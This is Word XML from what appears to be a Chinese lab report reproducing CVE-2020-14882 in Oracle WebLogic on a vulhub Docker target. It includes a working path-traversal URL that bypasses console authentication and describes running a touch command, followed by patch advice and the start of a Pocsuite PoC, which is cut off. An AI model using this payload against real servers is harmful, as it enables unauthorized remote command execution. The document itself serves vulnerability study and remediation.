        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc6854"/>
      <w:bookmarkStart w:id="23" w:name="_Toc28758"/>
      <w:bookmarkStart w:id="24" w:name="_Toc6133"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="0822C200" w14:textId="53299DCF" w:rsidR="005E7177" w:rsidRDefault="00733DD9" w:rsidP="005E7177">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005E7177" w:rsidRPr="005E7177">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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首先使用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vulhub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靶场搭建环境，构造请求，添加二次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URL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编码过后的‘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../</w:t>
      </w:r>
      <w:r w:rsidR="005E7177" w:rsidRPr="005E7177">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>’，绕过身份验证访问后台。</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="005E7177" w:rsidRPr="00781C36">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:bidi="ar"/>
          </w:rPr>
          <w:t>http://172.27.48.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&amp;_pageLabel=AppDeploymentsControlPage&amp;handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDoma</w:t>
        </w:r>
        <w:r w:rsidR="005E7177" w:rsidRPr="00781C36">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:bidi="ar"/>
          </w:rPr>
          <w:t>in%22%29</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7965F2CE" w14:textId="20AD285E" w:rsidR="00B77728" w:rsidRDefault="00B77728" w:rsidP="005E7177">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里对</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进行二次编码使得</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第一次解码以后</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>静态资源检查</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以绕过动态检查，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中间件解码以后就可以进行这个链式的函数调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.portal</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最终使用一个这里面的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>console.portal</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模板进行渲染</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后就可以执行命令</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC91761" w14:textId="68900D95" w:rsidR="00733DD9" w:rsidRDefault="005E7177" w:rsidP="005E7177">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EACA423" wp14:editId="52FEB3DD">
            <wp:extent cx="5274310" cy="2638425"/>
            <wp:effectExtent l="0" t="0" r="2540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3FB6" w14:textId="1BB51B49" w:rsidR="00E66185" w:rsidRDefault="00E66185" w:rsidP="00E66185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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>构建请求，抓包并修改，</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2" w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里是执行了一个</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2" w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>touch</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2" w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidR="00733A06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2" w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后可以生成一个名为</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2" w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"123.txt"</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2" w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的文件</w:t>
      </w:r>
      <w:r w:rsidR="00733A06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2" w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最早的实现好像是一个调用计算器的系统</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2" w:rsidRPr="00B77728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r w:rsidR="00D062B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请求，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使请求可以执行在目标位置添加文件‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>123.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’的命</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6BD4C8" w14:textId="33E050D7" w:rsidR="00E66185" w:rsidRDefault="00E66185" w:rsidP="00E66185">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="48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3F8A1B0D" wp14:editId="5B29EAAB">
            <wp:extent cx="5274310" cy="2635885"/>
            <wp:effectExtent l="0" t="0" r="254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D600" w14:textId="5BAEEB08" w:rsidR="00E66185" w:rsidRDefault="00E66185" w:rsidP="00E66185">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="48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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查看目标路径，发现目标文件被写入，命令被正确执行，同样的也可以执行类似调用系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:r w:rsidRPr="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA406EB" w14:textId="30D192A2" w:rsidR="00E66185" w:rsidRDefault="00E66185" w:rsidP="00E66185">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72F32751" wp14:editId="197E6428">
            <wp:extent cx="5274310" cy="263525"/>
            <wp:effectExtent l="0" t="0" r="2540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F3EF" w14:textId="7BBAD5A2" w:rsidR="00E66185" w:rsidRPr="00E66185" w:rsidRDefault="00E66185" w:rsidP="00E66185">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1A9939" w14:textId="77777777" w:rsidR="00733DD9" w:rsidRDefault="00733DD9">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D3AAB7" w14:textId="49A2B3BE" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38490639" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="64808715" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc18532"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险管理及规避</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="31CB0A52" w14:textId="67A210CD" w:rsidR="008F6264" w:rsidRPr="00E66185" w:rsidRDefault="00AA5F05">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidR="00E66185">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidR="00E66185">
        <w:t>logic server</w:t>
      </w:r>
      <w:r w:rsidR="00E66185" w:rsidRPr="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
      <w:r w:rsidR="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，更新补丁。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5557AF86" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc23034"/>
      <w:bookmarkStart w:id="27" w:name="_Toc10352"/>
      <w:bookmarkStart w:id="28" w:name="_Toc4033"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="1FF58950" w14:textId="7EAA0303" w:rsidR="008F6264" w:rsidRPr="00D90C5E" w:rsidRDefault="00D90C5E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00D90C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:t>vulhub</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:t>提供的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:t>cker</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:t>环境</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，复现后编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>oc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A18F8A" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc75461104"/>
      <w:bookmarkStart w:id="30" w:name="_Toc28030"/>
      <w:bookmarkStart w:id="31" w:name="_Toc10303"/>
      <w:bookmarkStart w:id="32" w:name="_Toc28445"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试中所用的工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="5E3E674C" w14:textId="46D27228" w:rsidR="00382B24" w:rsidRDefault="00D90C5E">
      <w:r w:rsidRPr="00D90C5E">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ock</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:t xml:space="preserve">er desktop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1242E6BC" w14:textId="5A65349C" w:rsidR="00382B24" w:rsidRDefault="00D90C5E">
      <w:r w:rsidRPr="00D90C5E">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="00382B24">
        <w:t xml:space="preserve"> pro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360C73EE" w14:textId="551B57D5" w:rsidR="008F6264" w:rsidRPr="00D90C5E" w:rsidRDefault="00382B24">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">csuite </w:t>
      </w:r>
      <w:r w:rsidR="00535F24">
        <w:t>2.0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C8404A" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc11461"/>
      <w:bookmarkStart w:id="34" w:name="_Toc19260"/>
      <w:bookmarkStart w:id="35" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="36" w:name="_Toc12892"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="1B570DA8" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc32666"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.1 POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="47573FF1" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>#!/usr/bin/env python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793CCAE0" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t># coding: utf-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FFAC6" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D843A19" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>from pocsuite.api.request import req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B5A574" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>from pocsuite.api.poc import register,Output, POCBase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07991ADA" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>from pocsuite.thirdparty.guanxing import  parse_ip_port, http_packet, make_verify_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A7CA28" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B031369" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>class TestPOC(POCBase):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600C636E" w14:textId="77777777" w:rsidR="00F06F13" w:rsidRPr="00F06F13" w:rsidRDefault="00F06F13" w:rsidP="00F06F13">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00F06F13">
        <w:t>    vulID = '''CVE-2020-14882'''</w:t>
      </w:r>
    </w:p>
